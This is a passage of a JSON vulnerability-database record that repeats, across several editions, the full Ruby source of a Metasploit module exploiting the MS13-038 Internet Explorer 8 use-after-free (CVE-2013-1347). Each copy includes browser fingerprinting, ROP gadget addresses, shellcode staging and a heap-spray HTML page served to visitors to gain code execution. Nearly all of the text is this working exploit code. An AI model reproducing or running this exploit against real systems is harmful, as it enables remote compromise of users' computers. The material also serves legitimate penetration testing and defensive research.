of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-26T10:05:32", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-26T12:04:54", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 9.0, "modified": "2017-11-26T12:04:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-26T12:04:54", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-01-04T11:57:56", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 9.0, "modified": "2018-01-04T11:57:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-01-04T11:57:56", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-01-04T17:56:36", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-01-04T17:56:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": 